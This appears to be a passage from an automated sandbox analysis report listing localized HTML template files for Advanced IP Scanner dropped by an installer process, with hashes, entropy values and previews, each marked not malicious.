                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>.........:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>........... .......:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>............:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>..........:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>....:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>.........:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">..

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\details_panel_cs_cz.tpl (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1153
                                                                                                                                                                                                  Entropy (8bit):4.877089271030429
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:AMJnuKoB2kV2B2uT2Bw2MKb2t52HcqQ2RCz282n0Kt1RhRGDbVzY1OzAkReEiWyv:lFosFsuS5XqiHJlL0Kt5RGDxReEhyv
                                                                                                                                                                                                  MD5:1D0D5C190B173CB0BED10C8B2E0F9697
                                                                                                                                                                                                  SHA1:83C10675F5A010668F4A278115BBC120F70EC99B
                                                                                                                                                                                                  SHA-256:F45A1EFA7DE1EE6ABA559166B744E6398A5BF5233EE3954E0A4BD3EB0904CE3F
                                                                                                                                                                                                  SHA-512:94E47E83159A43849DC269936D2B5E4866FB0C84DFDBB02664018CFCDBEDE06179F32324EE236910B4E2FEADC110F39EFD083A0F95B221E1D48A41A35E2C37FF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stav:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Opera.n. syst.m:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>V.robce:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>U.ivatel:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Typ:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Pozn.mky:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Slu.ba</center></b></td><td><b><center>Podrobnosti</ce

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\details_panel_da_dk.tpl (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1151
                                                                                                                                                                                                  Entropy (8bit):4.790118218856679
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFouisuSqZXqk/HuW4/0Kt5RGD3ReEhyv:HnisRqZXqmHuWK0U2DNs
                                                                                                                                                                                                  MD5:5AD712B9C416EE21623D620AB6019FB4
                                                                                                                                                                                                  SHA1:51DF096A58D6DF2A7CE33E22511C671883F2228C
                                                                                                                                                                                                  SHA-256:38D4DEAFB763B288A9A2322F4BE6E58909427ECFD025CAF0FDEB537C9880AA21
                                                                                                                                                                                                  SHA-512:608A2240E6F26C9F4A41A3A9B8D6EFCF4DC7735916CD58DFFC2AAC8948889515C2647F11DCF09FF9F0FC9245C7E09B548348B2B89925162EDE288FB0B74217E8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operativsystem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Producent:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Bruger:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Dato:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentarer:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>Oplysninger</cent

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\details_panel_de_de.tpl (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1153
                                                                                                                                                                                                  Entropy (8bit):4.788912446448768
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFouzisuSpI/XqOQ/HJla0Kt5RGDFTHReEhyv:HnesRpaXqOyHJla0U2DFJs
                                                                                                                                                                                                  MD5:FBA663967DF5DD4AB38D38DA1362598E
                                                                                                                                                                                                  SHA1:9557B768C03EB179FDEBB5F74724985F51685203
                                                                                                                                                                                                  SHA-256:466C8D1C6798F392281C81AF34638C334489AB56C7DB86A3A23B1EDB2918C2DA
                                                                                                                                                                                                  SHA-512:427505B6A8278CF009E4051D458BDABCBBE83B9D8B279FB7267777403E50BF26570D1FBD6EB4CD73E6F28E5565CEEA2B02B1EC3197FD85E78B5B0AB932FAC2D1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Betriebssystem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Hersteller:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Anwender:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Art:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentare:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Dienst</center></b></td><td><b><center>Ausf.hrlich</ce

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\details_panel_el_gr.tpl (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1256
                                                                                                                                                                                                  Entropy (8bit):5.1672203710221565
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFoDdHxqsuSTBXq0QH1R7y0Kt5RGDxD0nIgReEhyv:HeHQsR9XqVH1Re0U2DCds
                                                                                                                                                                                                  MD5:38E55188530EE1FC3B88A22697957911
                                                                                                                                                                                                  SHA1:BDF54BFF5183DEE6D233B521CFF1DBAB6D46BAA7
                                                                                                                                                                                                  SHA-256:EBD614652D83E094756B7E5490105E340FFE27C2664CF0DC4D3626C92E2AB6B4
                                                                                                                                                                                                  SHA-512:F8A603C8C5803B293B37E58AFE3845D187DD894799C9745AEF7F93785A9064BF81D45CEACC27E68F1B263C1769660E95E61D0E5C0B6EFEAED3FFE274A9016CD3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>.........:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>........... .......:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>.............:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>.......:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>.....:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>..........:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>......:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebe

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\details_panel_en_us.tpl (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1147
                                                                                                                                                                                                  Entropy (8bit):4.784372507341765
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFourZsuSd/Xqk/Hu0B10Kt5RGDz9ScReEhyv:HnrZsRhXqmHu410U2Dz9S+s
                                                                                                                                                                                                  MD5:04C416BEC9FE7DEC52E2F368353FF1F9
                                                                                                                                                                                                  SHA1:DB86325EDF8EED3639A26ED279A00EBC9208ED1E
                                                                                                                                                                                                  SHA-256:10946712CE123E177350A9D96F61B2011FFCCC90597880F256E3A24676CD4B30
                                                                                                                                                                                                  SHA-512:4069E9327ED9BE5FA81EF9A7148959B376677710D8D77CE1B247AF5065C1E7B2CC50561E47F7AEBA2DA48A8FBC79752147CCF262A8C1E6A66408ACFF07489E29
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operating system:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Manufacturer:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>User:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Date:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Comments:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>Details</center><

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\details_panel_es_es.tpl (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1173
                                                                                                                                                                                                  Entropy (8bit):4.837006163390497
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFoSb9bqsuShXqRHRM9BHBl0Kt5RGDhC+6ReEhyv:Hpb9bqsRhXqRHwBhl0U2Dw+As
                                                                                                                                                                                                  MD5:3DF24E832E07A361EE154A0635DF60F7
                                                                                                                                                                                                  SHA1:B02EDAA0C6B997830669B6FF1A3C6FB43331CFD3
                                                                                                                                                                                                  SHA-256:7A0B4383F55B6D2D52869CD50951FDE5ABE94208DE076161D12F7702537F37EA
                                                                                                                                                                                                  SHA-512:C8E81AFCF8E26086E83E410F158C46336CDB039014FDB1686F5E039032E044B87EBFEF1E9E71CBA34FA6D0F24EFE914A4AE180A61CB80E619C18BBE1D6ACAD2C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Estado:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistema operativo:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Fabricante:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Usuario:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tipo:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Fecha:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Comentarios:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Servicio t.cnico</center></b></td><td><b><center>M

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\details_panel_et_ee.tpl (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1150
                                                                                                                                                                                                  Entropy (8bit):4.850275626289269
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lForPQsuSRBXqDH03Rrh0Kt5RGDVx3rgReEhyv:HyPQsRRBXqDHyRt0U2DVtras
                                                                                                                                                                                                  MD5:6B21CA02EF7F5C3E6641DBB222A207DC
                                                                                                                                                                                                  SHA1:215CE642734FDA5004F603E593FAA2EB70663500
                                                                                                                                                                                                  SHA-256:3B0A1534FFEF9FB0B1BA169DDA53E26A940E0C644A47D8567E4E804D3DFADF24
                                                                                                                                                                                                  SHA-512:A61FEAEBB6819C6B2CCC8120FB5E64CE71E8399C19221255FB7C3BCB9F557291A75CF965704003A7EA748753097B9E43D0548C1ACC9FE76DA490F70D55B85461
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Olek:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Ops.steem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Tootja:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Kasutaja:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>T..p:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Kuup.ev:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentaarid:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Teenus</center></b></td><td><b><center>.ksikasjad</cente

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\details_panel_fa_ir.tpl (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1751
                                                                                                                                                                                                  Entropy (8bit):4.952964955431726
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ngn27UxzUZMUejUC3UCIUZzoUH0iUvoU7wpYlUQwU2DY4IO:gjmhfd0t07cqyOoIO
                                                                                                                                                                                                  MD5:23760926BFC668193D027DB24E198051
                                                                                                                                                                                                  SHA1:FF7AC19A7113F2DAA66B20C310A09752620E6455
                                                                                                                                                                                                  SHA-256:2E4A9A21A7D3444008849936F5473F78CB4DB93E9EE0992F023767B682300635
                                                                                                                                                                                                  SHA-512:F4B91BA666141C00C2282F2DCB3D5EB75F709A8E58D4DBF8992DAF17A1F163E019D1843A3A2441F392A46E4B9397666B5AD3CC76385BA3DF6897105250506E33
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 align="right" style="margin-right:2em">{name}</h3><p></p>..<table align="right">...<tr><td dir="rtl" align="right" style="padding-left:1em">{status}</td><td dir="rtl" align="right"><b>.....:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{os}</td><td dir="rtl" align="right"><b>..... ....:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{ip}</td><td dir="rtl" align="right"><b>IP:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{mac}</td><td dir="rtl" align="right"><b>MAC:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{manufacturer}</td><td dir="rtl" align="right"><b>......: ....:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{netbios}</td><td dir="rtl" align="right"><b>NetBIOS:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{user}</td><td dir="rtl" align="right"><b>.....:</b></td></tr>...<tr><td

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\details_panel_fi_fi.tpl (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1168
                                                                                                                                                                                                  Entropy (8bit):4.8708624632073105
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFokVpsuS4XqW1H5l+Ah1j0Kt5RGDLDiReEhyv:H9VpsR4XqW1H5lBh1j0U2DLDos
                                                                                                                                                                                                  MD5:6A9A7FB51DD16A4EDBEAF52A7567EA70
                                                                                                                                                                                                  SHA1:27B2444894F6B432AD36CB14D79BAD1BA6529887
                                                                                                                                                                                                  SHA-256:C4AD3344E412976BD9F7B8DDC8C60FDB94461201C814529CC5300FFDEB35BC08
                                                                                                                                                                                                  SHA-512:E627B085002A98E4C899FB4B9C7F4A90531C2D25233E3AD1ED0C4BFA87D0DE7D8E38F07D3CD0130955670D9C5F50F1D2BA40BBDF355F0FD202B1CE278A734F54
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Tila:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>K.ytt.j.rjestelm.:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Valmistaja:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>K.ytt.j.:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tyyppi:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>P.iv.m..r.:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentit:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Palvelu</center></b></td><td><b><ce

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\details_panel_fr_fr.tpl (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1163
                                                                                                                                                                                                  Entropy (8bit):4.810701494539991
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFo3WsuSsXq9e/Hu0Bk0Kt5RGDzLcReEhyv:HeWsRsXqqHu4k0U2DzL+s
                                                                                                                                                                                                  MD5:C6CEF752D7D9FD44C45C67AE637EC697
                                                                                                                                                                                                  SHA1:AD7D24492C5B44BBD96C0705308548BE46B5A743
                                                                                                                                                                                                  SHA-256:4A9255685D393748B0E36243601E546222C005F1D24C99C97CDB3B926A27BC5D
                                                                                                                                                                                                  SHA-512:0F4D2C69D548E5550A93CE5A8D8C58A6449D4432F561554ABA54880C154999D11360412CF15DED3261EA485C49976F173A49C211C22C2D80E8BFBACF981C168D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Statut:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Syst.me d'exploitation:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Fabricant:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Utilisateur:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Date:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Commentaires:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>D.

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\details_panel_he_il.tpl (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2080
                                                                                                                                                                                                  Entropy (8bit):4.902799949328129
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:b1+7UxUhUZU+UeUQUCUyUCUJUZUUoUH0UAUvUlU7UJUQU+UYD8UCtZUn+:xL+O2Z5bNdNG2y/rMyYGb6Ct2n+
                                                                                                                                                                                                  MD5:64D0C8B9E985CFD51786E85509000617
                                                                                                                                                                                                  SHA1:65FC3558C0BED0CDECFCDAF9BA55F7EFACCBC694
                                                                                                                                                                                                  SHA-256:F3A60BD72994B19FB680F5071DAA675A6A07FE3805522F26456958A260999FCD
                                                                                                                                                                                                  SHA-512:DEB626895CC5C445F99214F26FB605BD5D9787E0545224A5E2B51E33371B9A6E88533E5F443FE72B619959391BA5183C40EC50F76D46BD1313BB062EA0679F96
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 dir="rtl" align="right" style="margin-left:2em">{name}</h3><p></p>..<table dir="rtl" align="right">...<tr><td dir="rtl" align="right" style="padding-left:1em">{status}</td><td dir="rtl" align="right" style="padding-left:1em"><b>.....: </b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{os}</td><td dir="rtl" align="right" style="padding-left:1em"><b>..... .....: </b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{ip}</td><td dir="rtl" align="right" style="padding-left:1em"><b>IP:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{mac}</td><td dir="rtl" align="right" style="padding-left:1em"><b>MAC:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{manufacturer}</td><td dir="rtl" align="right" style="padding-left:1em"><b>....: </b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{netbios}</td><td dir="rtl" align="right" style="padding-left:1em"><b

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\details_panel_hr_hr.tpl (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1158
                                                                                                                                                                                                  Entropy (8bit):4.839285803199877
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:AMJnuKov2Fke2B2uT2Bxc+2MKb2tq2HcA2RCz282n0Kt1RhRGDbgzY1pvzAkReEs:lFouAsuSMBXqHH+lL0Kt5RGDjReEhyv
                                                                                                                                                                                                  MD5:1D24AAD630182B5018D26EE86FF9E1E5
                                                                                                                                                                                                  SHA1:D0FFCE32DEB2A2B5BD98274D2D74B135855243F1
                                                                                                                                                                                                  SHA-256:ED422482346F25140F3A4BC2B76225E64C0FB697FC4D9A0691F2B546E041D374
                                                                                                                                                                                                  SHA-512:D943A02304C8EBA2306830FCCDAEB033E7C8D9AB5F385DC57ED5AB3B08B20B8EF343F28D6DC12990B62A718B3B96885A7E9893D29A0ACA6E7FDDDD29AFD8E5F5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operativni sustav:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Proizvo.a.:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Korisnik:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Vrsta:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentari:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Usluga</center></b></td><td><b><center>Pojedinost

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\details_panel_hu_hu.tpl (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1177
                                                                                                                                                                                                  Entropy (8bit):4.903797892947706
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFoybd/suSYXqZqH0vi4cS0Kt5RGDAM9ReEhyv:HH9sRYXqYHqSS0U2DAes
                                                                                                                                                                                                  MD5:5F29203D51A1A790B22063DE29E377AC
                                                                                                                                                                                                  SHA1:C0EDB2A7108E532E66D7B730466022403C64F50D
                                                                                                                                                                                                  SHA-256:C698D74D598B66CBDA7E11B80A6179AAD54AC7CCBA7127E517E4B5AC9FF4C6CD
